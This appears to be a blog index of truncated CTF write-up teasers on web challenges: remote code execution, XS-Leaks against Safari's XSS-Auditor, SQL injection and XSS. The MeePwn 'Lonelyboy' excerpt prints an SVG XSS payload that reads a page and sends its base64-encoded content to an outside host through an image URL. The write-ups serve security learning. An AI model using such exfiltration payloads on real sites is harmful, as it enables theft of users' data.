Faust CTF 22 - AdminCrashBoard
RCE-As-A-Service (RAAS) This challenge was a webapp with ports 5000 and 22 open. On port 5000 runs a webapp called admincrashboard, written in Flask. User management is done with PAM, so registering a user creates a Linux user on the system. SSH is running on port 22. The webapp allows registered and logged-in users to upload so-called buttons that can be executed on the server. Example button: <?...
XS-Leaks - Detecting XSS-Auditor in Safari
Safari (13.0.4 and newer) will not log iframe requests in the Performance API list, when the iframe page is blocked by the XSS-Auditor. So the length of performance.getEntries() can leak the status of the Auditor. const check = async(url) => { let perfEntries = performance.getEntries().length return new Promise(r => { let frame = document.createElement('iframe') frame.src = url frame....
Hacklu 2019 - Car Repair Shop
Description Your Car broke down?! Come to our shop, we repair all cars! Even very old ones. Solution Car Repair Shop is a classic XSS challenge I created for the Hack.lu 2019 CTF. Looking at the static HTML code you find jQuery and two custom scripts. One defines a car class: class Car { constructor(type, model, color, pic, key="") { this....
Ctfzone 2018 - Piggy Bank
Description Piggy-Bank CTFZONE 2018 Web Challenge [100] Hack some bank for me. http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/ This is just a quick and dirty writeup. First, we created an account, logged in and looked for interesting stuff. There was a VIP Section: “This section is available only to privileged pigs with money in pockets. Transfer to the piggy-bank 1 000 000 coins and become important.” So we assumed this is what we had to do....
Seccon 2017 - automatic_door
Description automatic_door Seccon2017 [500] Get shell, and execute /flag_x http://automatic_door.pwn.seccon.jp/0b503d0caf712352fc200bc5332c4f95/ Skip Code <?...
MeePwn 2017 - Lonelyboy
Very quick little write-up: Get a friend account using xss in svg: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> var xhr = new XMLHttpRequest(); xhr.open('GET','/home.php?email_address_of_tsu_friend=m@m.de'); xhr.onload = function () { var myImage = new Image(100, 200); myImage.src ='http://example.com:81/'+btoa(xhr.responseText); }; xhr....
Ctfzone 2017 - Timehackers
On the contacts page, we were able to send links to the admin, which he would then visit, and we assumed that we had to steal credentials to get into the admin.php page. After we were not able to steal any cookies or find XSS on the site, we used nmap to scan the host. It showed that both 80 and 8080 were open; later a hint was released hinting that there was a difference between them....
MeePwn 2017 - Br0kenMySQL
This was a 3 stage SQLi challenge we solved during the MeePwn CTF. Shout out to Sceptic who solved the first stage and told me to look at the next one. Br0kenMySQL 100 pts BabeTrick <title>Br0kenMySQL</title><h1><pre> <p style='color:Red'>Br0kenMySQL</p> <?...
Hacklu 2015 - Prof. M. Eista Hax
Challenge description: Professor M. Eista Hax uses a digital tool to manage all his students. He is very happy with the system, but it does have one drawback: it does not support multiple users. This is a problem, because M. Eista Hax has employees who need access as well. To solve this he writes a super modern, highly encrypted web application to share the password with authorized users. Problem solved....